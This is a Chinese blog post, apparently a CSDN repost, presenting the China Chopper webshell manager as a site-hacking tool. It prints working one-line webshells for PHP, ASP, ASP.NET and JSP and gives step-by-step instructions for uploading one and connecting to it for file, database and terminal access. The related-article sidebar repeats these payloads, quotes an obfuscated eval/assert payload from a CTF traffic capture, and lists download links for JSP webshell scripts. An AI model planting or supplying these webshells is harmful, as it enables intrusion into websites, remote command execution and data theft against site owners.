黑站利器——中国菜刀

最新推荐文章于 2024-06-16 09:39:18 发布
最新推荐文章于 2024-06-16 09:39:18 发布
阅读量8.3k 收藏 21
点赞数 1
分类专栏: 安全工具使用

中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。


1.中国菜刀支持的服务端脚本:PHP、ASP、ASP.NET、JSP

2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。

3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。

4、支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。


在服务端运行的代码如下:
    PHP:    <?php@eval($_POST['pass']);?>
    ASP:    <%evalrequest(“pass”)%>
    ASP.NET:    <%@ PageLanguage=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>

 JSP:<%if(request.getParameter(“f”)!=null)(newjava.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
    (注意: ASP.NET要单独一个文件或此文件也是Jscript语言)



今天我只介绍PHP的方法(其他的大同小异)。


首先:我们首先要新建一个php文件,文件名随意取,然后写入一句代码:<?php eval($_POST['ee']); ?>  ;eval()这个函数大家并不陌生吧,就是把里面的字符串作为PHP代码执行。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。如下图:



第二步:打开菜刀这个软件,进入如下界面,右键点击“添加”;如下图:



第三步:此时会弹出一个添加shell的对话框,由图一看出我的 “dxr.php”上传在站点根目录,所以这里的地址填为:http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”,也就是<?php eval($_POST['ee']); ?> 这里的“ee”。下面配置项如果你知道用户名密码就填,不知道,不填,也不会影响文件管理和虚拟终端这两个功能,只是不能查看数据库了。



最后:点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!!


   


所以很多黑站者利用一些网站漏洞,上传一句话木马后,就基本上可以黑下你的站了。中国菜刀,就是这么强大!!


操作效果截图一:


  


操作效果截图二:


  


操作效果截图三:



 

内容转自:http://www.daixiaorui.com/read/17.html 

 

snert
关注
  • 1
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中国菜刀原理与实践
悦分享
08-03 1639
中国菜刀(Chopper)是一款经典的网站管理工具,具有文件管理、数据库管理、虚拟终端等功能。服务端其中‍Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作。配置类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种主机地址 主机地址可为机器名或IP地址,如localhost数据库用户 连接数据库的用户名,如root数据库密码 连接数据库的密码,如123456。...
【愚公系列】2023年06月 网络安全(交通银行杯)-中国菜刀
时光隧道
04-15 8310
Wireshark(前称Ethereal)是一个网络数据包分析软件。网络数据包分析软件的功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。在过去,网络数据包分析软件是非常昂贵,或是专门属于营利用的软件,Wireshark的出现改变了这一切。在GNU通用公共许可证的保障范围底下,用户可以以免费的代价获取软件与其代码,并拥有针对其源代码修改及定制化的权利。Wireshark是目前全世界最广泛的网络数据包分析软件之一。
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
中国菜刀,蚁剑,哥斯拉,冰蝎的流量特征区别
最新发布
Nove1205的博客
06-16 844
中国菜刀,蚁剑,哥斯拉,冰蝎的流量特征区别
最新中国菜刀caidao-20160620
seoppg的博客
05-12 841
2.1)文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;2.2)虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。2.3)数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。2.4) 自写脚本(只有Eval端才支持):通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
中国菜刀
qq_2411772106的博客
06-22 1320
中国菜刀工具是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理 一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");
中国菜刀的使用
xy_wjyjw的博客
10-27 185
中国菜刀实现与一句话木马联动:中国菜刀在本地(攻击机)。一句话木马在服务器(靶机)上。WebShell Manager管理工具。
BugkuCTF | 中国菜刀
weixin_47982238的博客
10-06 358
菜刀这一类型的题真的逃避了好久了,幸好有我的好儿子会督促我,终于成功了一道题!!!!! 谨以此博客纪念我的第一道菜刀,和我那勤勤恳恳的好大儿!!!!
JSP菜刀那点事
weixin_30633507的博客
12-05 711
脚本下载地址: JSP脚本:http://xsser.me/caidao/css.jsp Jspx脚本:http://xsser.me/caidao/jspx.jspx Jspf脚本:http://xsser.me/caidao/css.jspf 执行自定义查询备份: 在任意的SQL语句后面加上:--f:xxxx.sql(任意文件名和后缀) 如: SELECT * FROM...
《PLC综合开发利器——CoDeSys基础编程及应用指南》
11-14
### PLC综合开发利器——CoDeSys基础编程及应用指南 #### IEC61131-3标准 ##### IEC61131简介 IEC61131是国际电工委员会制定的一系列用于工业控制系统编程的标准。该标准旨在为工业自动化领域的编程提供统一的框架...
项目管理利器——maven
03-25
项目管理利器——maven,技术开发学习类稳定档案顶顶顶顶
IVBD『PHP菜刀html版开源』
11-11
IVBD工作室搜集网上资源及收费软件,授权于麒麟安全组旗下
保证代码运行质量的利器——PurifyPlus
02-03
总结来说,PurifyPlus是保证代码运行质量的利器,它的强大功能包括但不限于内存泄漏检测、代码覆盖率分析和性能优化,对于提升软件质量和稳定性具有至关重要的作用。在实际开发中,结合PurifyPlus和其他最佳实践,...
java 菜刀_jsp一句话木马菜刀
weixin_30341121的博客
02-20 6313
1.如何使用JSP一句话木马和菜刀木马相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨...
技术剖析中国菜刀原理
gscaiyucheng的专栏
05-03 4424
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3404
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
【BUGKU】CTF >>分析---中国菜刀
Chenamao的博客
08-09 2211
目录 【BUGKU】CTF >>分析---中国菜刀 【BUGKU】CTF >>分析---中国菜刀 解压完成后发现为pcapng文件格式 利用wireshark (我们的小鲨鱼)打开文件。 第一个数据包: 可以看出客户端用POST方式访问服务器的3.PHP文件 POST请求 123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."O..
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8369
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
开发者的利器——windows公文包
05-17
Windows公文包是一个非常实用的开发者工具,它提供了一系列的文档、工具和资源,帮助开发者更高效地开发Windows应用程序。其中包括: 1. Windows SDK:Windows软件开发工具包,提供了一系列的API接口和开发工具,帮助开发者开发Windows应用程序。 2. Visual Studio:Visual Studio是微软官方的集成开发环境(IDE),提供了代码编辑器、调试器、编译器等开发工具,支持多种编程语言。 3. .NET Framework:.NET Framework是微软的一个应用程序开发框架,它提供了一系列的类库、工具和运行时环境,支持多种编程语言。 4. MSDN:Microsoft Developer Network(微软开发者网络)是一个提供开发者文档、示例代码、教程等资源的网站,帮助开发者更好地使用微软的开发工具和技术。 Windows公文包是开发Windows应用程序的必备工具之一,它可以帮助开发者更快速、更高效地开发出高质量的应用程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值